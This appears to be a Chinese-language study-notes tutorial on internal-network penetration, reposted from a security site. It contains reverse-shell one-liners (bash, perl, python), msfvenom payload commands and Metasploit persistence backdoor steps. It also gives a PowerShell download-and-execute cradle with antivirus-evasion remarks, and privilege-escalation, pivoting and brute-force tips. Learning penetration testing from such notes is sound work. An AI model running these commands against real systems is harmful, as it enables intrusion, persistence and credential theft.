內網滲透思路整理與工具使用
前言
上個學期一直在學審計,前幾天ST2漏洞大火,隨便打一個就是root許可權,我卻拿著root許可權不知如何繼續進行。因為這個,發現了自己對滲透知識的缺失,因此用了兩週左右的時間學習補充了一下內網滲透的知識,看了不少大牛的文章,膜拜之餘還是做了一些筆記的。到滲透入門結束之餘,打算自己整理一下最近學習到的關於滲透的知識,寫一篇文章。
回過頭看滲透,在機械流程的前提下,什麼情況下使用什麼工具,做出什麼反應的適應性思路更為重要。一次大快人心的滲透過程與紮實的基礎知識和熟練的工具使用是分不開的。
滲透初探
一個概念
正向shell:攻擊者連線被攻擊者機器,可用於攻擊者處於內網,被攻擊者處於公網的情況。
攻擊者–>被攻擊者
反向shell:被攻擊者主動連線攻擊者,可用於攻擊者處於外網,被攻擊者處於內網的情況。
攻擊者<–被攻擊者
msf shell
反向shell
正向shell
Linux:msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.102 lport=4444 -f elf -o isshell
Windows:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=121.196.209.139 LPORT=4444 -f exe > abc.exe
Android:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > /root/apk.apk
其他的各種各樣的姿勢的反彈shell:
bash:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 perl: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' python: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
使用SSH通道:
Ssh -qTfnN -L port:host:hostport -l user remote_ip 正向隧道,監聽本地port Ssh -qTfnN -R port:host:hostport -l user remote_ip 反向隧道,用於內網穿透防火牆限制之類 Ssh -qTfnN -D port remotehost 直接進行socks代理
引數:
-q 安靜模式 -T 不佔用shell -f 後臺執行,推薦加-n引數 -N 不執行遠端命令
SSH埠轉發:
Ssh -CfNg -L port1:127.0.0.1:port2 user@host 本地轉發 Ssh -CfNg -R port2:127.0.0.1:port1 user@hsst 遠端轉發
拿到shell後的兩個方向
如果是低許可權的機器,就提權:
檢查作業系統發行版本:lsb_release -a
依據系統的核心,尋找對應的exp提權:
根據核心尋找exp的網站: https://www.kernel-exploits.com/ ,也可以用kali下的searchsploit命令
如果嘗試的所有的exp都失敗了,可以試一試新版本核心的exp。但是注意,核心exp提權有崩潰系統的風險。
一些其他的辦法:
利用SUID提權
1. SUID是一種屬性,他允許使用者執行的檔案以該檔案的擁有者身份執行。3.81的nmap中可以使用互動模式以root執行任意系統命令。
2. 環境變數劫持的方法提權
3. Passwd檔案是否可寫,可寫則修改密碼登入
4. Shadow是否可讀,可讀則使用hashcat或john暴力破解
5. 使用web端的一些密碼測試root密碼是否相同
6. 使用命令 ls -l /etc/cron* 檢視計劃任務,也許會有指令碼使自己成為root使用者
使用命令 netstat -antup檢視服務,有沒有什麼神奇的服務,可以用nc轉發出來。
相關工具:https://www.securitysift.com/download/linuxprivchecker.py 詳細地列出網路卡資訊,主機資訊,passwd檔案,開啟服務等等資訊。
提權的方法複雜而多樣,主要的手段還是第一種的使用exp提權。在嘗試所有的提權方法之後依然不能成功,那麼可以使用這臺主機作為跳板進行內網的進一步滲透。
後門
拿下一個shell容易,但是對方伺服器重啟,web漏洞被補上,木馬被刪除,還能有辦法保留住shell麼?這裡提供了幾種持續後門的方法。
Msf的持續後門
Persistence: run persistence -h:用於建立啟動項啟動,會建立登錄檔,建立檔案。(X86_Linux不支援此指令碼)
Run metsvc -h :用於建立服務,會建立meterpreter服務,並上傳三個檔案,容易被殺(我的msf版本不支援)使用-r引數可以解除安裝服務
Mof_ps_persist
Msf自動執行指令碼
Autorunscript,一個十分強大的指令碼,可以在生成會話的同事,執行指定的操作。可以通過autorunscript呼叫的指令碼有6個,目錄metasploit/scripts/meterpreter,有螢幕截圖,獲取環境變數等等。
使用persistence和autorunscript留後門的方法是:
Use explit/multi/handler Set payload windows/meterpreter/reverse_tcp Set lhost *** Set lport *** Set ExitOnSession false Set AutoRunScript persistence -r *** -p 7231 -U -X -I 30 Exploit -j -z
繞過攔截的計劃任務:
構造建立計劃任務:schtasks /create /tn mytask /tr notepad.exe /sc hourly /mo 1 #每小時執行一次
powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://a.com/1.ps1’);” 儲存以上命令到1.ps一,通過IEX下載執行。
本機測試時360第二種報毒,第一種通過。
網路分析
檢視本機網路資訊
ipconfig
使用代理探測內網
正向代理:Regeorg + proxychains (win下用proxycap)
Regeorg: https://github.com/sensepost/reGeorg
上傳伺服器可執行的tunnel檔案,在本機執行:
python reGeorgSocksProxy.py -p 2333 -u http://aaaaaa.com/tunnel.php
Proxychains: https://github.com/rofl0r/proxychains-ng
配置檔案
vim /etc/proxychains.conf
在最後一行新增socks5 127.0.0.1 2333(與regeorg埠相同)
使用時,在執行的命令前加proxhchains 4, 比如:proxychains 4 nmap -sT -Pn -n 127.0.0.1
反向代理:路由表+socks4a+proxychains
在msf中如果拿到一個meterpreter shell,有一個很簡單的新增路由表的方法:run autoroute -s 192.168.122.0/24,新增完路由表後,msf框架就可以使用跳板進行對192.168.122.0/24的網路訪問了。
若要使用nmap一類的工具,需要使用msf框架中的socks4a工具代理,目錄:auxiliary/server/socks4a
開啟socks4a後可以用netstat -antp | grep 1080來檢查一下是否成功。
Proxychains 不支援ICMP協議,nmap要加-sT 和 -Pn 引數。
使用nmap探測內網服務
如果只探測服務,則檢視hosts,掃描特定的服務。
如果為了探測整個內網,則全網段掃描。
通過跳板對內網爆破
kali工具包中的Hydra可以爆破SSH。
通過跳板轉發埠
使用msf的portfwd工具可以轉發內網ip的埠。
關注的兩個點:
尋找交換機路由器,嘗試snmp弱口令。關於snmp的知識:http://wooyun.jozxing.cc/static/drops/tips-409.html
通過收集到的資訊,編寫字典,對ftp,ssh,dbserver進行爆破。
對內網的web服務進行攻擊,內網的web弱口令更普遍。
為擴大控制範圍,優先控制交換機路由器等網路裝置。
分析網路
假設控制路由器,通過路由器收集以下資訊:
1. 裝置配置
2. 檢視相關許可權與exp提權
3. 檢視版本資訊
4. 檢視ip地址
5. 活動主機
6. 構建拓撲圖
之後可以通過流量監控獲取更多資料,進行深入的滲透。後面的內容我就沒有學習了,筆記戛然而止!
參考文章
https://www.waitalone.cn/linux-shell-rebound-under-way.html
http://www.tuicool.com/articles/j2eayaF
http://wooyun.jozxing.cc/static/drops/tips-16116.html
https://www.secpulse.com/archives/51092.html
http://wooyun.jozxing.cc/static/bugs/wooyun-2015-097180.html
本文轉自 安全客。
原文地址:http://bobao.360.cn/learning/detail/3683.html
相關文章
- 內網滲透工具內網
- 內網滲透思路探索 之新思路的探索與驗證內網
- 內網滲透應用 跨vlan滲透的一種思路內網
- 網站滲透思路網站
- Cobalt strike與內網滲透內網
- 內網滲透-初探域滲透內網
- 網安之-=滲透思路
- 內網滲透-內網資訊收集內網
- 內網滲透 Metasploit(MSF)基礎使用內網
- pentestdb滲透工具使用
- 內網滲透隨想內網
- Linux內網滲透Linux內網
- 工作組內網滲透內網
- 5、內網滲透之埠轉發與代理工具總結內網
- metasploit滲透測試筆記(內網滲透篇)筆記內網
- 網站滲透思路全方面總結網站
- 內網滲透—流量轉發內網
- cmseasy&內網滲透 Writeup內網
- 內網滲透-防火牆資訊內網防火牆
- 什麼是內網滲透和外網滲透?有何區別?內網
- Me-and-My-Girlfriend-1靶機滲透 (Vulnhub內網滲透)內網
- 內網滲透的一些工具和平臺彙總內網
- 內網滲透測試基礎內網
- Perun 內網滲透掃描神器內網
- VMware搭建內網滲透環境內網
- 內網滲透 IPC$ [空連線]內網
- 內網滲透-隧道代理轉發內網
- 12、強大的內網域滲透提權分析工具——BloodHound內網
- 紅日靶場(內網滲透)——2內網
- [Tools]內網滲透SMB轉發技巧內網
- Burpsuite 滲透測試工具使用UI
- 後滲透工具Koadic的使用介
- 內網滲透 day14-empire基礎命令的使用內網
- 內網滲透(八)橫向移不動內網
- 從零開始內網滲透學習內網
- 滲透測試基礎--內網轉發內網
- 內網滲透-橫向移動($IPC&at&schtasks)內網
- 9、Tunnel:論如何在內網中自由滲透內網